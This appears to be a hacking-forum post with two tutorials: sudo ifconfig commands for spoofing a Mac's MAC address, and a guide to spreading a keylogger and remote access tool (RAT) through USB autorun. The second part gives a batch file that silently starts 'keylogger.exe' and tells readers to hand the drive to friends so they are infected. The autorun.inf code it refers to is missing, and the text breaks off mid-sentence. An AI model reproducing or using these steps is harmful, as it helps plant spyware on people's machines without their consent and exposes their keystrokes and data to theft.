Spoof mac on macosx

This tutorial is for mac users only. As i will explain how to spoof your mac address on MacOsx.
Mac spoofing is useful! Ok lets start.

1: Open terminal and type. 

ifconfig en1 | grep ether

2: This will show you your current mac address.

3: Spoofing your mac address.for spoofing your mac address type. (you can type any mac adress but  64 bit adress)
sudo ifconfig en1 ether 00:e2:e3:e4:e5:e6

4: Verify you''s adress by useing 1step command write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.


Write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.


Spread your Keylogger&Rat using USB (Auto-run)

1: Creating autorun.inf Open notepad and copy the following code to it.


2: Save file as autorun.inf is the file we want to execute when our CD/USB is inserted. Anything.ico    is the name of icon file we want to set to our CD/USB drive.

3:Creating autorun.bat Open notepad and copy the following code to it.If it is saved in a folder named Cyberwarriors488 which is present in the root directory of CD/USB . Then
the code should be like this

@echo off
start Cyberwarriors488/keylogger.exe

4: Save it as autorun.bat and place it in the root directory of the CD/USB

Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your